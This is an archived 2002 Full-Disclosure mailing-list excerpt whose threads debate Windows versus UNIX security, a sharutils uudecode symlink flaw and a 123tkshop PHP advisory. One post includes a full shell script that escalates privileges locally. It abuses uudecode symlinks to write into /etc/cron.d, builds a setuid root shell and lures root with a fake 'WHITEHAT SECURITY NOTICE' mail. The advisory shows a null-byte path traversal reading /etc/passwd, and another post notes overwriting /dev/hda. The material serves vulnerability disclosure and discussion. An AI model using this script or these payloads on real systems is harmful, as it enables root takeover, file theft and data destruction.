rather then just shooting em in the head from the beginning. If openbsd only tried to do things half-assed, they certainly would not get the allcolades they do from the user comunity here. Thanks, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From mail at blazde.co.uk Mon Jul 15 22:40:11 2002 From: mail at blazde.co.uk (Roland Postle) Date: Mon, 15 Jul 2002 22:40:11 +0100 Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!) References: Message-ID: <002a01c22c48$336500c0$0a00a8c0@violetclub> > > The fact that 99% of Windows users are clueless is no reflection on Windows' > > actual security. > > But Microsoft touts "ease of use" which lulls people into believing that > you don't need as much skill to use or secure Windows as UNIX. And that's > irresponsible. I perhaps should have said it's no reflection on Windows' security relative to unix. It is of course Microsoft's responsibility to make Windows more secure for the average clueless user, especially given that their advertising campaigns are so obviously directed at the clueless user. > These are granular indeed, and confusing as hell. A good security model > should be simple; the Windows one is anything but. I can probably outline > the UNIX security model in 300 words. I challenge any Windows user to do > the same for Windows. > > And complexity is the enemy of security. It can lead to misunderstanding, > incorrect implementation, and ambiguity. Agreed complexity is the enemy of security, but unix file permissions are nothing but an unfortunate relic of the past. Owner and world permissions are a good start, and very useful. Group permissions are just a glance in the direction of a proper ACL. If a user wants to give access to another user to a file can they? Not unless those two users happen to be by themselves in the same group. The user has to give all other users in the same group (or worse, everybody, if they happen to be in different groups) access to the file. Then we come to the suid/sgid bits. What are they really about? It took me over a year of using unix to figure it out. If this file is executed it runs in the security context of it's owner and/or group. Is that a permission? It certainly isn't a permission that refers to a user. It refers to something the file can do, and that's very different from whether a user can read/write/execute it or whatever. The idea is to create 'program domains' (what a program can do or can't do, as opposed to what a user can do or can't do), but the fact that they're implemented as user domains is another fudge. And an extremely confusing one at that, because many unix programmers don't fully understand the distinction. Windows is no less confusing, but as Paul pointed out, it is at least functional. - Blazde From pauls at utdallas.edu Mon Jul 15 22:45:18 2002 From: pauls at utdallas.edu (Schmehl, Paul L) Date: Mon, 15 Jul 2002 16:45:18 -0500 Subject: [Full-Disclosure] Counseling not to use Windows (was Re:Anonymoussurfing my ass\!) Message-ID: <871080DEC5874D41B4E3AFC5C400611E026EE4F2@UTDEVS02.campus.ad.utdallas.edu> Comments inline. Paul Schmehl (pauls at utdallas.edu) Supervisor of Support Services The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/~pauls/ > -----Original Message----- > From: David F. Skoll [mailto:dfs at roaringpenguin.com] > Sent: Monday, July 15, 2002 3:25 PM > To: full-disclosure at lists.netsys.com > Subject: RE: [Full-Disclosure] Counseling not to use Windows > (was Re:Anonymoussurfing my ass\!) > > > On Mon, 15 Jul 2002, Schmehl, Paul L wrote: > > > That depends on how the admins configure things. :-) Here > at UTD, for > > example, it isn't possible to execute a VBS file unless you > know what > > you're doing. > > Well, that's very good. How about .exe? If they're attachments, they bounce at the mail gateway. > > > It's also possible to restrict the executables that a > > user can run, using group policies. > > Yes, it is. How much work is it to set all this up? Very easy. A few points and clicks in the admin's interface deploys the policy to the whole domain. > [snip] > > These are granular indeed, and confusing as hell. A good > security model should be simple; the Windows one is anything > but. I can probably outline the UNIX security model in 300 > words. I challenge any Windows user to do the same for Windows. > > And complexity is the enemy of security. It can lead to > misunderstanding, incorrect implementation, and ambiguity. > I totally agree with you. > > It isn't the OS that's the problem. > > I disagree. The design of the OS is a large part of the > problem. (I say "OS" here to include Microsoft applications > like IE, which (after > all) Microsoft insists are part of the OS.) > I think you're taking anecdotal evidence to condemn Windows unnecessarily. Just because Code Red ran around the world in short order doesn't *necessarily* mean the OS is flawed. It could mean the *philosophy* is flawed or the training is flawed or the admins are flawed. Remember, Unix admins have 30 years of experience under their belts telling them what is good security practice and what is not. Windows admins have 10? Maybe? > > That may have been true 3 or 4 years ago, but (at least in > the Linux and *BSD worlds) is no longer. The default > installation settings are pretty good nowadays. > Good point. I'm setting up a RedHat box for a website I do volunteer work for, and I have to say I'm pretty impressed. (First time I've worked with RedHat.) It had telnet and ftp and a number of services disabled by default, tcpwrappers installed and enabled, ipchains installed and enabled, etc., etc. Took me a little while just to figure out how to open the box up enough for me to ssh into it. > > I'm not arguing with you on that point. But I think it's > correct to say that any organization interested in long-term > security planning should consider weaning itself away from > proven-insecure software. Microsoft's track record is really > terrible, and I don't see any indications that things are > changing. How much benefit of the doubt do vendors deserve, anyway? > I really hate defending Microsoft. In fact I believe that the next few years will see them losing significant market share as the momentum of open source software really starts to impact them. (Walmart is now selling $500 boxes with Mandrake preinstalled.) However, their security track record is *not* as bad as you seem to think it is. You have to keep two things in mind; 1) their security advisories are for *all* their software, not just the Oses and 2) they're a huge company. It's like trying to manuever an oil tanker to make a 180 degree turn. You'd better have lots of time and room. Microsoft's two biggest problems are that decisions they made a long time ago, when the OS wasn't Internet-enabled, have come back to bite them big time since they added the TCP/IP stack, and their programmers have had no direction WRT security whatsover (until recently one would hope.) When I wrote my article about the UPnP Vulnerability for Securityfocus, it was almost laughable. They bought (or wrote - I don't know which) some software to discover buffer overflows and ran it on the XP release code. One of their VP's confidently announced that they had "eliminated" buffer overflows from XP. Two months later Marc released the UPnP vuln info about a buffer overflow that was **by far** the most devastating B/O MS had ever had. You have to remember that, for a business to switch from MS to *nix takes not only a huge shift in thinking on the part of management and users but also *wholesale* changes in the IT staff. I can quarantee you that our senior Windows admin would drown in a week if you threw *nix boxes at him and asked him to configure them securely (or even do "ls -l" for that matter.) Yet he's never had a Code Red or Nimda infected box and never had a breakin on his web servers. We haven't had a single major compromise on a Windows box under his control. (Can't say the same for other areas of the campus, but that's true of *nix as well.) From dfs at roaringpenguin.com Mon Jul 15 23:39:27 2002 From: dfs at roaringpenguin.com (David F. Skoll) Date: Mon, 15 Jul 2002 18:39:27 -0400 (EDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re:Anonymoussurfing my ass\!) In-Reply-To: <871080DEC5874D41B4E3AFC5C400611E026EE4F2@UTDEVS02.campus.ad.utdallas.edu> Message-ID: On Mon, 15 Jul 2002, Schmehl, Paul L wrote: > > Well, that's very good. How about .exe? > If they're attachments, they bounce at the mail gateway. Me, too. But that's a band-aid fix. Miserable design decisions on Microsoft's part have made e-mail responsible for spreading malicious executable content. In 1980, e-mail was plain text and totally safe. There is simply *no excuse* for having to scan e-mail at gateways -- it should *never* have been a problem in the first place. > > Yes, it is. How much work is it to set all this up? > Very easy. A few points and clicks in the admin's interface deploys the > policy to the whole domain. OK. Didn't know that. [snip] > I think you're taking anecdotal evidence to condemn Windows > unnecessarily. Please see http://www.roaringpenguin.com/graphs.php3 Cracked Windows boxes are so much of a problem that they've become background noise on the Internet. > Just because Code Red ran around the world in short > order doesn't *necessarily* mean the OS is flawed. It could mean the > *philosophy* is flawed or the training is flawed or the admins are > flawed. Remember, Unix admins have 30 years of experience under their > belts telling them what is good security practice and what is not. > Windows admins have 10? Maybe? That's not really an excuse. UNIX was never really designed with security in mind, and in fact until recently, UNIX boxes were pretty insecure. (And many commercial UNIXes still are.) The difference is that most UNIX faults were implementation errors which could be fixed without radically altering the OS (at least from the user's perspective.) Many Windows problems can't be fixed without changing the fundamental nature of the system. [snip] > You have to remember that, for a business to switch from MS to *nix > takes not only a huge shift in thinking on the part of management and > users but also *wholesale* changes in the IT staff. Or wholesale retraining. It's not easy. That's why it's a long-term strategic goal and not a short-term answer to security problems. -- David. From dfs at roaringpenguin.com Mon Jul 15 23:44:58 2002 From: dfs at roaringpenguin.com (David F. Skoll) Date: Mon, 15 Jul 2002 18:44:58 -0400 (EDT) Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymous surfing my ass\!) In-Reply-To: <002a01c22c48$336500c0$0a00a8c0@violetclub> Message-ID: On Mon, 15 Jul 2002, Roland Postle wrote: > Agreed complexity is the enemy of security, but unix file permissions are > nothing but an unfortunate relic of the past. Not arguing with that. UGO are simple, but not very flexible. They can be made to work well in most situations, though, especially if you use the modern setup whereby each user has his own group, and then you make additional groups for projects. > Then we come to the suid/sgid bits. What are they really about? It took me > over a year of using unix to figure it out. If this file is executed it runs > in the security context of it's owner and/or group. Is that a permission? Nope. It's a "file mode". > The idea is to create 'program domains' > (what a program can do or can't do, as opposed to what a user can do or > can't do), but the fact that they're implemented as user domains is another > fudge. And an extremely confusing one at that, because many unix programmers > don't fully understand the distinction. Actually, I find suid/sgid very easy to understand. They can be explained in a single sentence. And implementing program domains as user domains is necessary in UNIX because of the design. It might not be a pretty design, but it works, and (more importantly) doesn't have any fundamental security problems. For very security-sensitive applications, this might not be good enough. enough. NSA's SELinux has proper program domains and very fine-grained control over what each program can do. Internally to the Linux kernel, there are finer-grained "capabilities", but there's no agreement on how to map these to the file system. > Windows is no less confusing, but as Paul pointed out, it is at least > functional. Aw, come on. :-) The UNIX model is pretty functional too. -- David. From madduck at madduck.net Tue Jul 16 00:13:11 2002 From: madduck at madduck.net (martin f krafft) Date: Tue, 16 Jul 2002 01:13:11 +0200 Subject: [Full-Disclosure] security through obsolescence??!@?! In-Reply-To: <3D333D5C.1070501@bokeoa.com> References: <03c201c22c49$994e3770$1031020a@home.barrington.com> <3D32FF73.6020809@snosoft.com> <3D333D5C.1070501@bokeoa.com> Message-ID: <20020715231311.GG12705@fishbowl.madduck.net> also sprach Charles 'core' Stevenson [2002.07.15.2323 +0200]: > word man... rexd to the rescue? hehe... my god I know a couple of > sysadmins who have the same philosophy. but it's pointless. it's like > removing read priveleges from vulnerable suids! some of us have over a > gigabyte of security related exploits, scanners, sniffers, backdoors > etc.. Dating back to the 80's. ;) Could one such character, one who has over a gigabyte of security-related exploits, please contact me privately. I would like to profit from your help... -- martin; (greetings from the heart of the sun.) \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck consciousness: that annoying time between naps. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020716/c796b51c/attachment.bin From madduck at madduck.net Tue Jul 16 00:24:30 2002 From: madduck at madduck.net (martin f krafft) Date: Tue, 16 Jul 2002 01:24:30 +0200 Subject: [Full-Disclosure] Sharutils buggy? Message-ID: <20020715232430.GA14187@fishbowl.madduck.net> I'd like to get some educated thoughts and opinions on a recently found potential bug: http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-037 http://online.securityfocus.com/bid/4742 http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-049 http://www.aerasec.de/security/index.html?lang=en&id=ae-200204-033 http://bugs.debian.org/149454 http://www.kb.cert.org/vuls/id/336083 cheers, -- martin; (greetings from the heart of the sun.) \____ echo mailto: !#^."<*>"|tr "<*> mailto:" net at madduck today, i will gladly share my experience and advice, for there are no sweeter words than "i told you so." -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 240 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020716/d0de5be2/attachment.bin From mail at blazde.co.uk Tue Jul 16 00:41:10 2002 From: mail at blazde.co.uk (Roland Postle) Date: Tue, 16 Jul 2002 00:41:10 +0100 Subject: [Full-Disclosure] Korean Spam [Was: Counseling not to use Windows (was Re:Anonymoussurfing my ass\!)] References: Message-ID: <004701c22c59$82b840e0$0a00a8c0@violetclub> > Please see http://www.roaringpenguin.com/graphs.php3 The graph at the bottom is intersting, I get a lot of Korean spam too. Is it acknowledged by the Korean government as an acceptable way to do business? Or is there just some particularly successful email address collectors in Korea? Btw, this started happening way before the World Cup, though I did get quite a lot of Korean World Cup related spam in June. - Blazde From mail at blazde.co.uk Tue Jul 16 01:20:31 2002 From: mail at blazde.co.uk (Roland Postle) Date: Tue, 16 Jul 2002 01:20:31 +0100 Subject: [Full-Disclosure] Sharutils buggy? References: <20020715232430.GA14187@fishbowl.madduck.net> Message-ID: <007401c22c5f$0864bc50$0a00a8c0@violetclub> The problem seems to be that by default uudecode uses as the output filename the same filename used when the file was uuencoded. The fix is apparently to stop it following symbolic links. So an attacker couldn't uuencode with a filename that was in the /tmp directory. Then link the file in the tmp directory to whatever they wanted. My guess is you can't specify an absolute path (or ../) in the filename, and the assumption is that lots of people extract these files in the tmp directory where malicous symbolic links might reside. Regardless it's not a 'grave' security problem as some people have said. And no, Uuencode isn't (or shouldn't be) suid/sgid before you ask. - Blazde ----- Original Message ----- From: "martin f krafft" To: "full-disclosure people" Sent: Tuesday, July 16, 2002 12:24 AM Subject: [Full-Disclosure] Sharutils buggy? From core at bokeoa.com Tue Jul 16 01:23:55 2002 From: core at bokeoa.com (Charles 'core' Stevenson) Date: Mon, 15 Jul 2002 18:23:55 -0600 Subject: [Full-Disclosure] Sharutils buggy? References: <20020715232430.GA14187@fishbowl.madduck.net> Message-ID: <3D33679B.3050707@bokeoa.com> Well you could check out some e-mail programs etc... Imagine that an attacker sends e-mail to root at some.host with a uuencoded attachment. The attacker has local access to the machine and knows that root's e-mail program calls system("uudecode %s",file) would allow the attacker to setup the uuencode file in such a fashion as to make this work... whether such a case exists is pure speculation. But out of boredom I've attached a theorhetical exploit. peace, core martin f krafft wrote: > I'd like to get some educated thoughts and opinions on a recently found > potential bug: > > http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-037 > http://online.securityfocus.com/bid/4742 > http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-049 > http://www.aerasec.de/security/index.html?lang=en&id=ae-200204-033 > http://bugs.debian.org/149454 > http://www.kb.cert.org/vuls/id/336083 > > cheers, > -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: uudecode.sh Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020715/631943bf/attachment.ksh From core at bokeoa.com Tue Jul 16 01:32:04 2002 From: core at bokeoa.com (Charles 'core' Stevenson) Date: Mon, 15 Jul 2002 18:32:04 -0600 Subject: [Full-Disclosure] Sharutils buggy? References: <20020715232430.GA14187@fishbowl.madduck.net> <007401c22c5f$0864bc50$0a00a8c0@violetclub> Message-ID: <3D336984.7050607@bokeoa.com> Actually it uses the full path.. at least on debian.. see previously attached concept exploit. Of course I had to create a retarded mail program that simply rand uudecode on the attachment. ;) peace, core Roland Postle wrote: > The problem seems to be that by default uudecode uses as the output filename > the same filename used when the file was uuencoded. The fix is apparently to > stop it following symbolic links. So an attacker couldn't uuencode with a > filename that was in the /tmp directory. Then link the file in the tmp > directory to whatever they wanted. My guess is you can't specify an absolute > path (or ../) in the filename, and the assumption is that lots of people > extract these files in the tmp directory where malicous symbolic links might > reside. > > Regardless it's not a 'grave' security problem as some people have said. And > no, Uuencode isn't (or shouldn't be) suid/sgid before you ask. > > - Blazde > > ----- Original Message ----- > From: "martin f krafft" > To: "full-disclosure people" > Sent: Tuesday, July 16, 2002 12:24 AM > Subject: [Full-Disclosure] Sharutils buggy? > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > > From core at bokeoa.com Tue Jul 16 01:34:42 2002 From: core at bokeoa.com (Charles 'core' Stevenson) Date: Mon, 15 Jul 2002 18:34:42 -0600 Subject: [Full-Disclosure] Sharutils buggy? References: <20020715232430.GA14187@fishbowl.madduck.net> <3D33679B.3050707@bokeoa.com> Message-ID: <3D336A22.7090700@bokeoa.com> One small fix it should create the file with 666 perms ;) Charles 'core' Stevenson wrote: > Well you could check out some e-mail programs etc... Imagine that an > attacker sends e-mail to root at some.host with a uuencoded attachment. The > attacker has local access to the machine and knows that root's e-mail > program calls system("uudecode %s",file) would allow the attacker to > setup the uuencode file in such a fashion as to make this work... > whether such a case exists is pure speculation. But out of boredom I've > attached a theorhetical exploit. > > peace, > core > > martin f krafft wrote: > >> I'd like to get some educated thoughts and opinions on a recently found >> potential bug: >> >> http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-037 >> http://online.securityfocus.com/bid/4742 >> http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-049 >> http://www.aerasec.de/security/index.html?lang=en&id=ae-200204-033 >> http://bugs.debian.org/149454 >> http://www.kb.cert.org/vuls/id/336083 >> >> cheers, >> > > > ------------------------------------------------------------------------ > > #!/bin/sh > # > # Conceptual uuencode + mailprogram privilege > # local privilege escalation exploit > # > # Coded out of boredom... > # > # by Charles Stevenson > # > # Mon Jul 15 18:22:13 MDT 2002 > > target="/home/core/mymail" # Root's mail program that calls uudecode > tempdir="/tmp" > > if [ -u /.sushi ] ; then > exec /.sushi > fi > > printf "Checking for $target..." > if [ -f "$target" ] ; then > echo "done." > else > echo "NO!" > exit 1 > fi > > if [ ! -d "$tempdir/core" ]; then > printf "Creating $tempdir/core..." > if ! mkdir "$tempdir/core" 2>/dev/null ; then > echo "FAILED!" ; exit 1 > fi > echo "done." > fi > > printf "Changing directory to $tempdir/core..." > if ! cd "$tempdir/core" 2>/dev/null ; then > echo "FAILED!" ; exit 1 > else > echo "done." > fi > > printf "Creating cron.d symlink..." > if ! ln -fs /etc/cron.d/core you 2>/dev/null; then > echo "FAILED!" ; exit 1 > else > echo "done." > fi > > printf "Changing umask..." > if ! umask 000 ; then > echo "FAILED!" ; exit 1 > else > echo "done." > fi > > printf "Compiling root shell..." > cat >sushi.c < #include > int main (int argc, char **argv, char **envp) { > setuid(0); > setgid(0); > execve("/bin/sh",argv,envp); > return -1; > } > EOF > if ! cc sushi.c -o sushi 2>/dev/null; then > echo "FAILED!" ; exit 1 > else > echo "done." > fi > > printf "Compiling cron takeover..." > cat >takeover.c < #include > main() { system("cp $tempdir/core/sushi /.sushi ; chmod 6777 /.sushi"); } > EOF > if ! cc takeover.c -o own 2>/dev/null; then > echo "FAILED!" ; exit 1 > fi > echo "done." > > printf "Performing attack... come back when root reads his e-mail..." > cat >gosh < core > EOF > uuencode gosh /tmp/core/you > uuownme > if mail-files root at localhost ascii "WHITEHAT SECURITY NOTICE Your system was compromised. Attached is a tarball with details exlaining how." uuownme; then > echo "FAILED!"; exit 1 > fi > echo "MESSAGE SENT!" > > printf "Waiting for root to check his e-mail with $target..." > while [ ! -u /etc/cron.d/core ] ; then > sleep 1; printf "." > done > echo "DONE!!!" > > printf "Setting up evil cron job..." > cat >croncore < */1 * * * * root if [ -x "$tempdir/core/own" ] ; then "$tempdir/core/own"; fi > EOF > if ! cat croncore 2>/dev/null >/etc/cron.d/core; then > echo "FAILED!" ; exit 1 > else > echo "done." > fi > > printf "Waiting for root shell" > while [ ! -u /.sushi ] ; do > sleep 1 ; printf "." > done > echo "done." > > cd / > > printf "Cleaning up real quick..." > if ! /.sushi -c "rm -rf $tempdir/core /etc/cron.d/core"; then > echo "FAILED??? Fuck it!" > else > echo "done." > fi > > echo "Spawning root shell!!! God Damn! I say GOD DAMN!!" > if ! exec /.sushi -i; then > echo "Exec Failed!!! BUMMER!" ; exit 1 > fi From core at bokeoa.com Tue Jul 16 01:41:01 2002 From: core at bokeoa.com (Charles 'core' Stevenson) Date: Mon, 15 Jul 2002 18:41:01 -0600 Subject: [Full-Disclosure] Sharutils buggy? References: <20020715232430.GA14187@fishbowl.madduck.net> <3D33679B.3050707@bokeoa.com> <3D336A22.7090700@bokeoa.com> Message-ID: <3D336B9D.4050805@bokeoa.com> Sorry for the spam all... my last message was sent in hast thinking I'd made an error. It does in fact create the uuecoded file with 666 perms because I remembered to call umask 0.. when I tested locally I forgot to removed the first uuencode file I'd created before chaning umask... sorry and enjoy the search for a program that calls uudecode as root on a user supplied file. peace, core From dotslash at snosoft.com Tue Jul 16 04:45:10 2002 From: dotslash at snosoft.com (KF) Date: Mon, 15 Jul 2002 20:45:10 -0700 Subject: [Full-Disclosure] Sharutils buggy? References: <20020715232430.GA14187@fishbowl.madduck.net> <3D33679B.3050707@bokeoa.com> <3D336A22.7090700@bokeoa.com> <3D336B9D.4050805@bokeoa.com> Message-ID: <3D3396C6.9020205@snosoft.com> heh I am drunk... fuckers ambushed me in my cubicle before I left work ... -KF you got malloc on ppc working? From dotslash at snosoft.com Tue Jul 16 04:50:24 2002 From: dotslash at snosoft.com (KF) Date: Mon, 15 Jul 2002 20:50:24 -0700 Subject: [Full-Disclosure] Sharutils buggy? References: <20020715232430.GA14187@fishbowl.madduck.net> <3D33679B.3050707@bokeoa.com> <3D336A22.7090700@bokeoa.com> <3D336B9D.4050805@bokeoa.com> <3D3396C6.9020205@snosoft.com> Message-ID: <3D339800.9000809@snosoft.com> KF wrote: > heh I am drunk... fuckers ambushed me in my cubicle before I left work > ... > -KF > you got malloc on ppc working? > > _______________________________________________ > Full-Disclosure - We believe in it. > Full-Disclosure at lists.netsys.com > http://lists.netsys.com/mailman/listinfo/full-disclosure > > heh damn reply too... -KF From avart at gmx.de Mon Jul 15 21:56:40 2002 From: avart at gmx.de (avart at gmx.de) Date: Mon, 15 Jul 2002 22:56:40 +0200 (MEST) Subject: [Full-Disclosure] Again NULL and addslashes() (now in 123tkshop) Message-ID: <24546.1026766600@www31.gmx.net> Hi! Ok, another announce about a php application containing unslashed SQL-Queries and bad include/require statements. Several problems in 123tkshop ------------------------------------- # What is 123tkshop? 123tkshop is a ecommerce software written in php. It's providing a full featured online shop. More information are available at: #### include + NULL problem #### # Problem description There are several include statements which use variables passed by the user. So if register_globals is on and magic_quotes_gpc is off you are able to read any file on the webserver: function_foot_1.inc.php [...] include("styles/$designNo/footer.php"); [...] # So what's the problem with NULL? If $designNo contains NULL (aka \0 or %00) the include statement ignores everything after the NULL and includes the file. Here's some metacode explaining the behavior: foobar.php looks like this: Calling the file with the following parameter: foobar.php?input=bla%00bla results in (with enabled magic_quotes_gcp):
Warning: Failed opening '../bla\0blablubb' for inclusion (include_path='.:/usr/local/lib/php') in /home/user/public_html/foobar.php on line 2
This doesn't seem to be exploitable, but what happens, if magic_quotes_gcp is turned off (like on php.ini-recommened, for performance reasons, without pointing to THIS kind of problem)?:
Warning: Failed opening '../bla' for inclusion (include_path='.:/usr/local/lib/php') in /home/user/public_html/foobar.php on line 2
Huh?! Did you get it? Everything after NULL (%00) is ignored! So what can we do now? We can take a look at the avaiable users: foobar.php?input=../../../etc/passwd%00 Voila... You can open every file you want. Ok, not every file. It has to be readable by the http-user, like wwwrun or www. # And the solution? One can test, if a file exists with the function file_exists(). This function doesn't ignore the characters after NULL. On the other side, one could try to avoid using userdata to open a file. # Fix? The author released a new version (0.3.1) that checks _every_ file being included. You can download it at . If you aren't able to update an older version, enable "magic_quotes_gqc". See for further information about securing php applications. #### missing addslashes() #### # Problem description A lot of data passed (there are just a few exeptions) to mysqld is NOT checked for control characters like ', " et al. So one is able to commit injected sql queries. The problem exists, when magic_quotes_gpc is turned off. function_describe_item1.inc.php is one of the dangerous files. For further information about dangerous sql queries see: * . * # And the solution? One can use addslashes() for _every_ data a user enters and is submitted to the database. Lazy people hope, that magic_quotes_gpc is enabled. Never expect, that an admin configured a webserver correct, try to start the security at application level. # Fix? The author will release a new version ASAP. ##### Credits ##### For the german-speaking folk: -- GMX - Die Kommunikationsplattform im Internet. http://www.gmx.net From raju at linux-delhi.org Tue Jul 16 02:15:50 2002 From: raju at linux-delhi.org (Raju Mathur) Date: Tue, 16 Jul 2002 06:45:50 +0530 Subject: [Full-Disclosure] List Charter In-Reply-To: References: Message-ID: <15667.29638.750529.713998@mail.linux-delhi.org> >>>>> "Corey" == Corey Snow writes: Corey> [snip] Corey> ######################################################### Corey> The information contained in this e-mail and subsequent Corey> attachments may be privileged, confidential and protected Corey> from disclosure. This transmission is intended for the Corey> sole use of the individual and entity to whom it is Corey> addressed. If you are not the intended recipient, any Corey> dissemination, distribution or copying is strictly Corey> prohibited. If you think that you have received this Corey> message in error, please e-mail the sender at the above Corey> e-mail address. Corey> ######################################################### You could also add that quasi-legal messages like the one above are not permitted on the list. Unless, of course, the list maintainers have enough of a legal defense fund to bear the costs of being sued for disseminating a `privileged, confidential and protected from disclosure' message despite being warned. Oooh, you put it on Google too, you naughty boy you! By reading this message you agree to pay me $1000 on the 3rd of each month whose name contains a vowel. -- Raju -- Raju Mathur raju at kandalaya.org http://kandalaya.org/ It is the mind that moves From raju at linux-delhi.org Tue Jul 16 02:51:12 2002 From: raju at linux-delhi.org (Raju Mathur) Date: Tue, 16 Jul 2002 07:21:12 +0530 Subject: [Full-Disclosure] Counseling not to use Windows (was Re: Anonymoussurfing my ass\!) In-Reply-To: References: <871080DEC5874D41B4E3AFC5C400611E026EE417@UTDEVS02.campus.ad.utdallas.edu> Message-ID: <15667.31760.658428.600055@mail.linux-delhi.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 >>>>> "Ron" == Ron DuFresne writes: Ron> [snip] Ron> You hit on the duality of the issue beofre trying to Ron> refine it into a plurality issue. The *real* problem is Ron> vendors relasing bugy code with insecure defaults which Ron> *promotes* users remaining clueless. take a look at the Ron> wireless issues spewing into the airwaves now, and look at Ron> not only the default installs of the products available for Ron> playing with wireless toys and trikets, but, take a serious Ron> look at the documentation and how much is devoted to the Ron> issue of securing the toys. Ron> [more snip] I agree that vendors are responsible for security issues to quite an extent. As far as I can see, there are three real issues for security from the vendor point of view: 1. Insecure defaults. Many vendors will sacrifice security in favour of usability. This, for some reason, seems to be even more true in the Windows world than in Linux/*BSD/Unix, where vendors try to at least make things usable but with as good an underlying security layer as possible. Redmond doesn't appear to give a d*mn about end-user security, as long as the user has a `clean, comfortable, easy usage experience'. Definitely the vendor's responsibility. 2. Insecure design and coding. IMO open source/free software has an edge here, since most of the developers don't have to work against release deadlines, unlike the proprietary software vendors. I don't accuse MS (or anyone else) of deliberately making insecure software. I do accuse them of bowing to marketing pressure and hence sacrificing due diligence in making software secure. Further, the free software model encourages reuse of components, and my uneducated guess is that as time passes the more secure components automatically float to the top of the heap whenever reuse becomes necessary. Of course, this conveniently ignores the remote exploit in AIM which AOL itself exploited to remotely upgrade users' AIM's whenever they (AOL) upgraded the protocol (i.e. whenever someone else managed to reverse engineer the protocol and bring out a compatible III-party client :-) 3. Retrofitting security. It's is completely impossible to envisage two scenarios when designing and developing software: - - How it is going to be used - - How it is going to be attacked I'm a software writer from time to time, and all I can do as a developer is *try* to ensure that the software and protocols I develop are secure, to the best of my vision and ability. This problem is not new: earlier it was said that it was impossible to make software idiot-proof, since idiots are so smart; today I'd say that it is impossible to make software and protocols crack-proof, since crackers are too smart and varied. Until it becomes possible to project in advance all possible scenarios in which a software could be used we will never see a `secure' product or environment. Instances of security being retrofitted in this sort of situation abound: AUTH and STARTTLS extensions to SMTP, the uncountable patches from software and OS vendors, HTTPS extentions to HTTP, encryption extensions to IPv4, etc. The depressing conclusion I come to is that it will become increasingly difficult to lock down applications, protocols and operating systems; we will just have to learn to live in insecure environments. Regards, - -- Raju - -- Raju Mathur raju at kandalaya.org http://kandalaya.org/ It is the mind that moves -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Processed by Mailcrypt 3.5.6 and Gnu Privacy Guard iEYEARECAAYFAj0zfAQACgkQyWjQ78xo0X95+QCgl46cqfviPVDMoH55o96WDpWk B1wAni0wxt/AMiiSI5Lva8HshIdc0QET =Q7bh -----END PGP SIGNATURE----- From pb at bieringer.de Tue Jul 16 08:12:53 2002 From: pb at bieringer.de (Peter Bieringer) Date: Tue, 16 Jul 2002 09:12:53 +0200 Subject: [Full-Disclosure] Sharutils buggy? In-Reply-To: <20020715232430.GA14187@fishbowl.madduck.net> References: <20020715232430.GA14187@fishbowl.madduck.net> Message-ID: <16180000.1026803573@localhost> --On Tuesday, July 16, 2002 01:24:30 AM +0200 martin f krafft wrote: > I'd like to get some educated thoughts and opinions on a recently > found potential bug: > > http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-037 > http://online.securityfocus.com/bid/4742 > http://www.aerasec.de/security/index.html?lang=en&id=ae-200205-049 > http://www.aerasec.de/security/index.html?lang=en&id=ae-200204-033 > http://bugs.debian.org/149454 > http://www.kb.cert.org/vuls/id/336083 One additial memo: The original advisory and afaik the fixed version from RHL still not metioned that devices also are candidates for overwriting. Think about begin 666 /dev/hda ... Peter From listuser at mobileye.co.il Tue Jul 16 11:28:05 2002 From: listuser at mobileye.co.il (Nathan Fain) Date: Tue, 16 Jul 2002 13:28:05 +0300 Subject: [Full-Disclosure] w32.frethem.k@mm and good reading References: <03c201c22c49$994e3770$1031020a@home.barrington.com> Message-ID: <3D33F535.9070405@mobileye.co.il> This method of obfuscation applies If you are only protecting a static website that doesnt deal with any security critical data (credit info, shopping, etc.) and defacement of your site is a primary concern. Script kiddies deface websites (with few exceptions). Script kiddies run OS fingerprint scan's or other scans to find their target. Yes, script kiddies will be quite fooled by this method. Otherwise you are only obfuscating your own perception of security. IP stacks are secure in their own right (i haven't heard of anyone gaining remote access by exploiting the IP stack). And this is about all you change keeping with an older OS itself. The idea of keeping older versions of services you required (ie Apache) has little application as well. It applies to the concern of stability. Once *proven* stable (left to your own interpretation) one should switch to the later version. Reason being that at some point the developers will stop looking at code in older version all together. So even if you have the oldest version of apache with the latest patches available for it, you will likely have wide vulnerabilities in functions that are used in the code or underling libraries. And in such a scenario, while you might have stopped script kiddies, you have left the door wide open for anyone determined to get in your system. The article applies to those whose primary concern is perhaps defacement alone > By Robin Miller, NewsForge.com > >> Posted: 06/06/2002 at 12:10 GMT >> [724.gif] Here's an interesting way to secure an Internet-connected >> computer against intruders: Make sure the operating system and >> software it runs are so old that current hacking tools won't work on >> it. This was suggested by Brian Aker, one of the programmers who works >> on Linux.com, NewsForge, Slashdot, and other OSDN sites; he runs >> several servers of his own that host a number of small non-profit >> sites in the Seattle area. "I have one box still running a version of >> Solaris that's so old none 